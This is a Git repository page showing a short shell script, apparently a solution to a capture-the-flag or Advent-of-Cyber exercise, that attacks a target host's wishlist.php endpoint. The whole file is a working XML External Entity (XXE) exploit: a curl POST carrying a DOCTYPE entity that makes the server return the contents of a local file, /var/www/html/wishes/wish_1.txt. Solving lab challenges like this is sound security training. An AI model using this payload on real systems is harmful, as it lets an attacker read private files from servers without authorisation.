aoc24/5/wish.sh
Sivert V. Sæther 8ffc4db7a8 batman
2024-12-08 17:19:06 +01:00

13 lines
326 B
Bash
Executable File

#!/bin/sh
target=`cat trgt`
curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
-d "<!--?xml version='1.0' ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM '/var/www/html/wishes/wish_1.txt'> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>"